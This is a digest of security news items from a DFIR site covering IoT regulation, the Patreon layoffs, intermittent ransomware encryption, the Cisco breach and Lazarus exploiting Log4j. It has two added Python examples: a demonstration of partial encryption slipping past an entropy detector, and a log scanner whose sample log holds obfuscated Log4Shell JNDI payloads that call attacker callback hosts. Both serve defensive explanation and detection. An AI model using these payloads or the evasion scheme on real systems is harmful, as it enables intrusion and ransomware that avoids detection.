AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 09/12/2022

EU to introduce strict IoT security regulation

The EU is set to introduce a law that would require smart devices to follow strict cyber security rules, on threat of a device ban. Internet of Things (IoT) devices such as smart home controls or fitness trackers are becoming more ubiquitous, making life more convenient while also increasing the vectors through which threat actors can perpetrate cyber crime. The proposal, which Reuters reports is titled the Cyber Resilience Act, will be formally put forward on 13 September. Once law, smart device manufacturers will be required to review the risk profiles of their products and fix any discovered vulnerabilities. In the event of a problem or threat being discovered, the law will also require companies to notify the European Union Agency for Cybersecurity (ENISA) within 24 hours.


Transacting in Person with Strangers from the Internet

Communities like Craigslist, OfferUp, Facebook Marketplace and others are great for finding low- or no-cost stuff that one can pick up directly from a nearby seller, and for getting rid of useful things that don’t deserve to end up in a landfill. But when dealing with strangers from the Internet, there is always a risk that the person you’ve agreed to meet has other intentions. Nearly all U.S. states now have designated safe trading stations, mostly at local police departments, which ensure that all transactions are handled in plain view of both the authorities and security cameras. These safe trading places exist because in-person transactions arranged over the Internet sometimes don’t end well for one or more of the parties involved. The website Craigslistkillers has catalogued news links for at least 132 murders linked to Craigslist transactions since 2015. Many of these killings involved high-priced items like automobiles and consumer electronics, where the prospective buyer apparently intended all along to kill the owner and steal the item offered for sale. Others were motivated simply by a desire to hurt people.


Patreon security team layoffs cause backlash in creator community

Patreon laid off its security team this week, according to several former employees, sparking cybersecurity concerns among users who are increasingly threatening to leave the platform. The layoffs gained visibility after noted privacy lawyer Whitney Merrill tweeted a LinkedIn post from former Patreon privacy engineer Emily Metcalfe. “Wouldn’t trust my data there,” Merrill said on Twitter. Patreon, which boasts as many as 8 million monthly users on its platform for fans to support creators and artists, suffered a major breach in 2015. Hackers broke into the company’s user database and released several gigabytes of internal data including usernames, email addresses and mailing addresses. No credit-card numbers or Social Security numbers were accessed in the breach, the company said at the time.


Ransomware gangs switching to new intermittent encryption tactic

A growing number of ransomware groups are adopting a new tactic that helps them encrypt their victims’ systems faster while reducing the chances of being detected and stopped. The tactic is called intermittent encryption: only parts of each targeted file’s content are encrypted, which still renders the data unusable without a valid decryptor and key. For example, by encrypting 16 bytes and then leaving the next 16 bytes untouched, and repeating that pattern across the file, the encryption process rewrites only half of the file and takes roughly half the time of full encryption while still locking the contents for good. Additionally, because far less data is rewritten and much of the original content survives in place, automated detection tools that look for signs of trouble such as intense file I/O or a sudden jump in file entropy are more likely to fail.
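The following is an added example, not code from the article or from any ransomware family, that makes the trade-off concrete. It encrypts a constructed low-entropy "document" two ways, every byte versus alternating 16-byte blocks, then compares the number of bytes rewritten (the I/O signal) and the Shannon entropy of the result, the signal a naive entropy-threshold detector relies on. The HMAC-SHA256 counter-mode keystream is a stand-in for whatever cipher a real strain uses; the key, nonce, sample text and 7.5 bits/byte threshold are assumptions chosen for the demonstration.

```python
import hashlib
import hmac
import math
from collections import Counter

# Constructed sample "document": repetitive, low-entropy text, 3136 bytes.
SAMPLE_PLAINTEXT = b"Quarterly revenue figures for the Berlin office.\n" * 64
KEY = b"\x11" * 32    # fixed demo key; a real strain generates one per victim/file
NONCE = b"\x22" * 8   # fixed demo nonce


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for a real cipher).

    Only the on/off encryption pattern matters for this demonstration.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt_full(data: bytes, key: bytes, nonce: bytes):
    """Encrypt every byte. Returns (ciphertext, bytes_rewritten)."""
    ks = keystream(key, nonce, len(data))
    return bytes(a ^ b for a, b in zip(data, ks)), len(data)


def encrypt_intermittent(data: bytes, key: bytes, nonce: bytes, block: int = 16, skip: int = 16):
    """Encrypt `block` bytes, leave the next `skip` bytes untouched, repeat.

    XOR is symmetric, so calling this again with the same key/nonce decrypts.
    Returns (ciphertext, bytes_rewritten).
    """
    ks = keystream(key, nonce, len(data))
    out = bytearray(data)
    rewritten = 0
    pos = 0
    while pos < len(data):
        end = min(pos + block, len(data))
        for i in range(pos, end):
            out[i] = data[i] ^ ks[i]
        rewritten += end - pos
        pos = end + skip
    return bytes(out), rewritten


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext, around 4 for English text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    """Naive entropy-threshold detector of the kind intermittent encryption evades."""
    return shannon_entropy(data) >= threshold


def compare(data: bytes = SAMPLE_PLAINTEXT) -> dict:
    """Run both strategies on `data` and collect the detection-relevant numbers."""
    full_ct, full_io = encrypt_full(data, KEY, NONCE)
    part_ct, part_io = encrypt_intermittent(data, KEY, NONCE)
    round_trip, _ = encrypt_intermittent(part_ct, KEY, NONCE)  # decrypt with the key
    return {
        "plain_entropy": shannon_entropy(data),
        "full_entropy": shannon_entropy(full_ct),
        "partial_entropy": shannon_entropy(part_ct),
        "full_bytes_rewritten": full_io,
        "partial_bytes_rewritten": part_io,
        "full_flagged": looks_encrypted(full_ct),
        "partial_flagged": looks_encrypted(part_ct),
        "partial_still_unusable": part_ct != data,
        "partial_round_trip_ok": round_trip == data,
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name:26s} {value}")
```

On this sample the fully encrypted file scores near 8 bits/byte and is flagged, while the intermittently encrypted file rewrites half as many bytes and stays below 7.2 bits/byte, so the threshold detector misses it even though the file is no longer usable. Detectors that sample entropy per chunk, or that watch for the regular encrypted/plaintext stripe pattern, fare better against this tactic than a whole-file average.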


Cisco confirms that data leaked by the Yanluowang ransomware gang were stolen from its systems

In August, Cisco disclosed a security breach: the Yanluowang ransomware gang had breached its corporate network in late May and stolen internal data. The investigation conducted by the Cisco Security Incident Response Team (CSIRT) and Cisco Talos revealed that the threat actors compromised a Cisco employee’s credentials after gaining control of a personal Google account to which credentials saved in the victim’s browser were being synchronized. Once they had obtained the credentials, the attackers launched voice phishing attacks in an attempt to trick the victim into accepting the MFA push notifications initiated by the attacker.


North Korean Lazarus Group Hacked Energy Providers Worldwide

A malicious campaign conducted by the North Korean threat actor Lazarus Group targeted energy providers around the world between February and July 2022. The campaign was previously partially disclosed by Symantec and AhnLab in April and May, respectively, but Cisco Talos is now providing more details about it. Writing in an advisory on Thursday, the security researchers said the Lazarus campaign involved the exploitation of vulnerabilities in VMware Horizon to gain initial access to targeted organizations. “The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post–exploitation led to the download of their toolkit from web servers,” the team wrote. “In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to.”
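The Log4j vulnerability referred to above is Log4Shell (CVE-2021-44228), triggered by a `${jndi:...}` lookup string landing in any logged field such as a URL parameter or User-Agent header. The following is an added example, not code from Talos or the article, of the triage check an incident responder would run over a Horizon front-end access log: it URL-decodes each line, resolves the common `${lower:...}`, `${upper:...}` and `${...:-x}` nesting tricks used to hide the string, and reports the source IP and the decoded lookup. The log lines, TEST-NET addresses and callback ports are constructed for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed Apache-combined-style access log (TEST-NET addresses); not real telemetry.
# Lines 2-5 carry Log4Shell lookups in plain, case-nested, default-value-nested and
# URL-encoded form; line 6 carries a non-JNDI lookup that must not be reported.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Sep/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.9 - - [12/Sep/2022:10:01:09 +0000] "GET /portal/?x=${${lower:j}ndi:rmi://203.0.113.9:1099/o} HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.9 - - [12/Sep/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.9:1389/b}"
198.51.100.4 - - [12/Sep/2022:10:02:00 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2Fx.example%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Sep/2022:10:02:30 +0000] "GET /portal/?lang=${env:LANG:-en} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# ${lower:X} / ${upper:X} lookups: replace with X in the requested case.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-X} lookups (incl. ${::-X} and ${env:NOPE:-X}): replace with the default X.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# What is left after de-nesting if the request was a Log4Shell attempt.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^{}]*\}", re.IGNORECASE)


def _apply_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def deobfuscate(text: str, max_rounds: int = 8) -> str:
    """URL-decode, then resolve innermost lookups until the text stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):
        resolved = DEFAULT_LOOKUP.sub(lambda m: m.group(1), CASE_LOOKUP.sub(_apply_case, text))
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(log_text: str) -> list:
    """Return one {"ip", "payload"} record per decoded JNDI lookup found in the log."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        src_ip = line.split(" ", 1)[0]  # first field of the combined log format
        for m in JNDI_LOOKUP.finditer(deobfuscate(line)):
            hits.append({"ip": src_ip, "payload": m.group(0)})
    return hits


def attacker_ips(hits: list) -> list:
    """Distinct source addresses, in order of first appearance, for blocking/pivoting."""
    seen = []
    for h in hits:
        if h["ip"] not in seen:
            seen.append(h["ip"])
    return seen


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["payload"])
    print("sources:", attacker_ips(found))
```

The decoded `ldap://`, `rmi://` or `dns://` target in each hit is the attacker's callback host, which is the natural pivot for the next step Talos describes: look for outbound connections from the Horizon server to that host and for the toolkit download and new local accounts that followed.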
